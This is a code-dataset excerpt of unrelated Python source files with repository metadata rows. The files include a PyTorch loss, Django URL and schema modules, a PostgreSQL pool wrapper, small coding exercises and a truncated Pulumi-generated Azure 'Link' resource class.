if attribute_name in spectrum_group.attrs:
if attribute_value != spectrum_group.attrs[attribute_name]:
logging.error("{} is not the same in .txt and .elv files".format(attribute_name))
else:
spectrum_group.attrs[attribute_name] = attribute_value
| 48.913669 | 106 | 0.698779 | 905 | 6,799 | 4.868508 | 0.233149 | 0.138675 | 0.147072 | 0.164775 | 0.302315 | 0.222424 | 0.128688 | 0.053336 | 0.043123 | 0 | 0 | 0.020547 | 0.198264 | 6,799 | 138 | 107 | 49.268116 | 0.787745 | 0.128548 | 0 | 0 | 1 | 0 | 0.012544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035294 | false | 0 | 0.070588 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19e983d6fa6ccacdf56013ebe5512a2bfbc502f4 | 266 | py | Python | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | import torch
class CELoss(torch.nn.Module):
def __init__(self):
super(CELoss, self).__init__()
def forward(self, y_pred, y_true):
y_pred = torch.clamp(y_pred, 1e-9, 1 - 1e-9)
return -(y_true * torch.log(y_pred)).sum(dim=1).mean()
| 22.166667 | 62 | 0.620301 | 43 | 266 | 3.511628 | 0.534884 | 0.13245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028986 | 0.221805 | 266 | 11 | 63 | 24.181818 | 0.700483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
c203432f8c53e83233d8d52f9f44b299487593fa | 804 | py | Python | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 9 | 2021-07-21T21:58:08.000Z | 2022-03-11T07:02:26.000Z | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 1 | 2022-01-05T17:14:26.000Z | 2022-03-11T18:46:17.000Z | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 4 | 2021-07-30T12:35:36.000Z | 2022-01-26T15:40:34.000Z | from django.contrib.auth import get_user_model
from ninja import Schema
from ninja.orm import create_schema
from typing import Dict, List
UsernameSchemaMixin = create_schema(
get_user_model(),
fields=[get_user_model().USERNAME_FIELD]
)
EmailSchemaMixin = create_schema(
get_user_model(),
fields=[get_user_model().EMAIL_FIELD]
)
UserOut = create_schema(
get_user_model(),
exclude=['password']
)
class LoginIn(UsernameSchemaMixin):
password: str
class RequestPasswordResetIn(EmailSchemaMixin):
pass
class SetPasswordIn(UsernameSchemaMixin):
new_password1: str
new_password2: str
token: str
class ChangePasswordIn(Schema):
old_password: str
new_password1: str
new_password2: str
class ErrorsOut(Schema):
errors: Dict[str, List[str]]
| 17.866667 | 47 | 0.746269 | 95 | 804 | 6.073684 | 0.4 | 0.07279 | 0.124783 | 0.098787 | 0.291161 | 0.249567 | 0.145581 | 0.145581 | 0.145581 | 0 | 0 | 0.005997 | 0.170398 | 804 | 44 | 48 | 18.272727 | 0.85907 | 0 | 0 | 0.233333 | 0 | 0 | 0.00995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.366667 | 0.133333 | 0 | 0.566667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
c21f20598fcb4edb1815430a740e9fd92d38d7c4 | 1,767 | py | Python | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | 55 | 2016-04-05T15:42:21.000Z | 2018-07-19T07:13:09.000Z | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | null | null | null | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | 18 | 2016-04-05T15:40:13.000Z | 2018-03-15T23:50:27.000Z | from django.conf.urls import patterns, include, url
from apiserver.resources import v1_api
urlpatterns = patterns(
'apiserver.views',
(r'^v1/account/register/$', 'account__register'),
(r'^v1/account/login/$', 'account__login'),
(r'^v1/account/login_by_weibo/$', 'account__login_by_weibo'),
(r'^v1/account/unbind_weibo/$', 'account__unbind_weibo'),
(r'^v1/account/bind_weibo/$', 'account__bind_weibo'),
(r'^v1/account/may_know/$', 'account__may_know'),
(r'^v1/account/update_gexinid/$', 'account__update_gexinid'),
(r'^v1/account/numbers/$', 'account__numbers'),
(r'^v1/account/email_verify/$', 'account__email_verify'),
# v1/book/ # Get BookResource
# v1/bookown/ # Get BookOwnershipResource
(r'^v1/bookown/add/$', 'bookown__add'),
(r'^v1/bookown/delete/(?P<bo_id>.*)/$', 'bookown__delete'),
(r'^v1/bookown/export/$', 'bookown__export'),
(r'^v1/bookown/(?P<bo_id>.*)/$', 'bookown__edit'),
# v1/bookborrow/ # Get BookBorrowRecResource
(r'^v1/bookborrow/(?P<rec_id>.*)/$', 'bookborrow__detail'),
# ^v1/bookborrowreq/ # Get BookBorrowReqResource
(r'^v1/bookborrowreq/(?P<req_id>.*)/$', 'bookborrowreq__detail'),
(r'^v1/friends/follow/$', 'friends__follow'),
# v1/follow/ # Get FollowResource
# v1/oplog/ # Get OperationLogResource
(r'^v1/request/bookborrow/$', 'bookborrow__add'),
# ^v1/user/ # Get UserResource
(r'^v1/task/export/$', 'task__export'),
(r'^v1/monitor/push_notification/$', 'monitor__push_notification'),
(r'^v1/monitor/error_report/$', 'monitor__error_report'),
(r'^v1/monitor/test_email/$', 'monitor__test_email'),
(r'^v1/monitor/logging_and_http/$', 'monitor__logging_and_http'),
(r'^', include(v1_api.urls)),
)
| 44.175 | 71 | 0.658744 | 216 | 1,767 | 5.046296 | 0.305556 | 0.06055 | 0.082569 | 0.041284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020248 | 0.13356 | 1,767 | 39 | 72 | 45.307692 | 0.691705 | 0.14601 | 0 | 0 | 0 | 0 | 0.646783 | 0.428284 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c228a9b1d80f8cfbee6a5a60ed922e91b7ade1a6 | 176 | py | Python | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | 1 | 2022-03-29T06:53:37.000Z | 2022-03-29T06:53:37.000Z | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | null | null | null | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | null | null | null | import nox
@nox.session(python=['3.7', '3.8', '3.9', '3.10', 'pypy3.7', 'pypy3.8', 'pypy3.9'])
def unittest(session):
session.install('.[test]')
session.run('pytest')
| 25.142857 | 83 | 0.590909 | 28 | 176 | 3.714286 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097403 | 0.125 | 176 | 6 | 84 | 29.333333 | 0.577922 | 0 | 0 | 0 | 0 | 0 | 0.267045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c23545ce408d38954fc18d89851addac263b547f | 651 | py | Python | darwin/importer/formats/darwin.py | v7labs/darwin-lib | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | 2 | 2019-09-04T13:32:07.000Z | 2019-09-19T10:10:41.000Z | darwin/importer/formats/darwin.py | v7labs/darwin-lib | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | 1 | 2019-09-19T11:17:44.000Z | 2019-09-19T17:34:31.000Z | darwin/importer/formats/darwin.py | v7labs/darwin-cli | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | null | null | null | from pathlib import Path
from typing import Optional
import darwin.datatypes as dt
from darwin.utils import parse_darwin_json
def parse_path(path: Path) -> Optional[dt.AnnotationFile]:
"""
Parses the given file into a darwin ``AnnotationFile`` or returns ``None`` if the file does not
have a ``.json`` extension.
Parameters
----------
path : Path
The ``Path`` of the file to parse.
Returns
-------
Optional[dt.AnnotationFile]
The ``AnnotationFile`` file or ``None`` if the file was not parseable.
"""
if path.suffix != ".json":
return None
return parse_darwin_json(path, 0)
| 25.038462 | 99 | 0.645161 | 85 | 651 | 4.882353 | 0.435294 | 0.057831 | 0.072289 | 0.062651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002016 | 0.238095 | 651 | 25 | 100 | 26.04 | 0.834677 | 0.486943 | 0 | 0 | 0 | 0 | 0.017731 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.5 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
c238cadb5993cdf46dc561a36f19902caaa298f8 | 325 | py | Python | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | 1 | 2020-05-04T05:54:06.000Z | 2020-05-04T05:54:06.000Z | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | null | null | null | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | null | null | null | import platform
import os
if platform.architecture()[0] == '32bit':
os.environ["PYSDL2_DLL_PATH"] = "./SDL2/x86"
else:
os.environ["PYSDL2_DLL_PATH"] = "./SDL2/x64"
import game_framework
from pico2d import *
import start_state
# fill here
open_canvas(1200, 800, True)
game_framework.run(start_state)
close_canvas() | 19.117647 | 48 | 0.735385 | 47 | 325 | 4.87234 | 0.638298 | 0.078603 | 0.131004 | 0.157205 | 0.227074 | 0.227074 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 0.129231 | 325 | 17 | 49 | 19.117647 | 0.742049 | 0.027692 | 0 | 0 | 0 | 0 | 0.174603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.416667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
c2416378b5347dc2b26104a502e6c271d41efa81 | 6,765 | py | Python | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
# _____ _ #
# / ____ | | #
# | | ___ _ __ ____| |__ ___ ___ #
# | | / _ \/ '_ ` _ \_ __/ _ \/ __/ #
# | |___| (_) | | | | | | |_| /__/ (_ #
# \_____\___/|_| |_| |_/\___\___|\___\ #
# _____ _ #
# / ____| | | #
# | (___ _ _ ___| |_ ___ _ __ ___ ___ #
# \___ \| | | / __| __/ _ \ '_ ` _ \/ __| #
# ____) | |_| \__ \ || __/ | | | | \__ \ #
# |_____/ \__, |___/\__\___|_| |_| |_|___/ #
# __/ | #
# |___/ #
# #
################################################################################
# #
# Copyright (c) 2018 Comtec Systems #
# All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# License for the specific language governing permissions and limitations #
# under the License. #
# #
################################################################################
import psycopg2
from psycopg2 import pool
class DBManager(object):
def __init__(self):
self.ip = '127.0.0.1'
self.port = '5432'
self.dbname = ''
self.user_id = ''
self.user_pw = ''
self.conn = None
pass
def print_dbinfo(self):
print "[IP=%s][PORT=%s][DB Name=%s][User ID=%s][User PW=%s]" % (self.ip, self.port, self.dbname, self.user_id, self.user_pw)
def Connect(self, ip, port, dbname, user_id, user_pw):
self.ip = ip
self.port = port
self.dbname = dbname
self.user_id = user_id
self.user_pw = user_pw
self.print_dbinfo()
#self.conn = psycopg2.connect("host='%s' port='%s' dbname='%s' user='%s' password='%s'" % (self.ip, self.port, self.dbname, self.user_id, self.user_pw))
self.conn= psycopg2.pool.ThreadedConnectionPool(1
, 20
, user = user_id
, password = user_pw
, host = ip
, port = port
, database = dbname)
if self.conn is None:
return False
return True
def Get_Conn(self):
if self.conn is None:
return None
return self.conn.getconn()
def Put_Conn(self, conn):
if self.conn is None:
return None
self.conn.putconn(conn)
def Select(self, strQuery):
#print strQuery
# Init
conn = self.Get_Conn()
if conn is None:return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
# Query 실행
try:
cursor.execute(strQuery)
except psycopg2.IntegrityError :
conn.rollback()
print "(Select) psycopg2.IntegrityError"
except Exception as e:
conn.rollback()
cursor.close()
print "(Select) Exception : %s" % (e)
self.Put_Conn(conn);
return cursor
def Execute(self, strQuery):
return_state = None
#print "(Query Execute) %s " % strQuery
# Init
conn = self.Get_Conn()
if conn is None:return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
# Query 실행
try :
cursor.execute(strQuery)
conn.commit()
return_state = True
except psycopg2.IntegrityError :
conn.rollback()
return_state = False
print "(Execute) psycopg2.IntegrityError"
except Exception as e:
conn.rollback()
return_state = False
print "(Execute) Exception : %s" % (e)
self.Put_Conn(conn);
cursor.close()
return return_state
def Execute_List(self, list_query):
return_state = True
# Init
conn = self.Get_Conn()
if conn is None:return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
for strQuery in list_query:
#print "(Query Execute) %s " % strQuery
# Query 실행
try :
cursor.execute(strQuery)
except psycopg2.IntegrityError :
print "(Execute_List) psycopg2.IntegrityError"
return_state = False;
break;
except Exception as e:
print "(Execute_List) Exception : %s" % (e)
return_state = False;
break;
if return_state == None or return_state==False:
conn.rollback()
else:
conn.commit()
cursor.close()
self.Put_Conn(conn);
return return_state
dbmanager = DBManager() | 42.018634 | 160 | 0.376201 | 504 | 6,765 | 4.674603 | 0.253968 | 0.040747 | 0.025467 | 0.040747 | 0.406197 | 0.352292 | 0.342954 | 0.269949 | 0.225806 | 0.188879 | 0 | 0.009527 | 0.503474 | 6,765 | 161 | 161 | 42.018634 | 0.691873 | 0.414339 | 0 | 0.505155 | 0 | 0.010309 | 0.066923 | 0.018925 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.020619 | 0.020619 | null | null | 0.092784 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c248808de352dba7cf537239fff1a9413acf6d6b | 963 | py | Python | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | class Solution:
def checkValidString(self, s: str) -> bool:
left_count = 0
star_count = 0
for char in s:
if char == '(':
left_count += 1
elif char == '*':
star_count += 1
else:
if left_count > 0:
left_count -= 1
elif star_count > 0:
star_count -= 1
else:
return False
if left_count == 0:
return True
right_count = 0
star_count = 0
for char in s[::-1]:
if char == ')':
right_count += 1
elif char == '*':
star_count += 1
else:
if right_count > 0:
right_count -= 1
elif star_count >0:
star_count -= 1
else:
return False
return True | 26.75 | 47 | 0.369678 | 93 | 963 | 3.645161 | 0.247312 | 0.159292 | 0.117994 | 0.176991 | 0.59587 | 0.59587 | 0.59587 | 0.59587 | 0.59587 | 0.265487 | 0 | 0.04186 | 0.553479 | 963 | 36 | 48 | 26.75 | 0.746512 | 0 | 0 | 0.545455 | 0 | 0 | 0.004149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dfa13542a9552093d48e374336dd6982ac97d981 | 208 | py | Python | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | null | null | null | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | null | null | null | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | 2 | 2019-06-07T10:37:06.000Z | 2021-11-26T14:45:42.000Z | from django import forms
from .models import NicEditImage
__all__ = ('NicEditImageForm',)
class NicEditImageForm(forms.ModelForm):
class Meta:
model = NicEditImage
fields = '__all__' | 16 | 40 | 0.701923 | 20 | 208 | 6.9 | 0.65 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221154 | 208 | 13 | 41 | 16 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0.110048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
dfc27fbfd9eab2bd3bd88883c044f6ab22a63657 | 402 | py | Python | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | 1 | 2015-11-06T02:26:50.000Z | 2015-11-06T02:26:50.000Z | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | null | null | null | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | null | null | null | # Given an array of ints length 3, return an array with the elements "rotated
# left" so {1, 2, 3} yields {2, 3, 1}.
# rotate_left3([1, 2, 3]) --> [2, 3, 1]
# rotate_left3([5, 11, 9]) --> [11, 9, 5]
# rotate_left3([7, 0, 0]) --> [0, 0, 7]
def rotate_left3(nums):
nums.append(nums.pop(0))
return nums
print(rotate_left3([1, 2, 3]))
print(rotate_left3([5, 11, 9]))
print(rotate_left3([7, 0, 0]))
| 26.8 | 77 | 0.60199 | 76 | 402 | 3.092105 | 0.381579 | 0.32766 | 0.038298 | 0.076596 | 0.391489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135952 | 0.176617 | 402 | 14 | 78 | 28.714286 | 0.574018 | 0.569652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.5 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
dfd16e7f7186f4d548a8b339ad96b392fe186ea1 | 20,857 | py | Python | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['LinkArgs', 'Link']
@pulumi.input_type
class LinkArgs:
def __init__(__self__, *,
hub_name: pulumi.Input[str],
participant_property_references: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]],
resource_group_name: pulumi.Input[str],
source_interaction_type: pulumi.Input[str],
target_profile_type: pulumi.Input[str],
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
reference_only: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Link resource.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
pulumi.set(__self__, "hub_name", hub_name)
pulumi.set(__self__, "participant_property_references", participant_property_references)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "source_interaction_type", source_interaction_type)
pulumi.set(__self__, "target_profile_type", target_profile_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if link_name is not None:
pulumi.set(__self__, "link_name", link_name)
if mappings is not None:
pulumi.set(__self__, "mappings", mappings)
if operation_type is not None:
pulumi.set(__self__, "operation_type", operation_type)
if reference_only is not None:
pulumi.set(__self__, "reference_only", reference_only)
@property
@pulumi.getter(name="hubName")
def hub_name(self) -> pulumi.Input[str]:
"""
The name of the hub.
"""
return pulumi.get(self, "hub_name")
@hub_name.setter
def hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "hub_name", value)
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@participant_property_references.setter
def participant_property_references(self, value: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]):
pulumi.set(self, "participant_property_references", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Input[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@source_interaction_type.setter
def source_interaction_type(self, value: pulumi.Input[str]):
pulumi.set(self, "source_interaction_type", value)
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Input[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@target_profile_type.setter
def target_profile_type(self, value: pulumi.Input[str]):
pulumi.set(self, "target_profile_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="linkName")
def link_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the link.
"""
return pulumi.get(self, "link_name")
@link_name.setter
def link_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "link_name", value)
@property
@pulumi.getter
def mappings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@mappings.setter
def mappings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]):
pulumi.set(self, "mappings", value)
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> Optional[pulumi.Input['InstanceOperationType']]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@operation_type.setter
def operation_type(self, value: Optional[pulumi.Input['InstanceOperationType']]):
pulumi.set(self, "operation_type", value)
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> Optional[pulumi.Input[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@reference_only.setter
def reference_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reference_only", value)
class Link(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
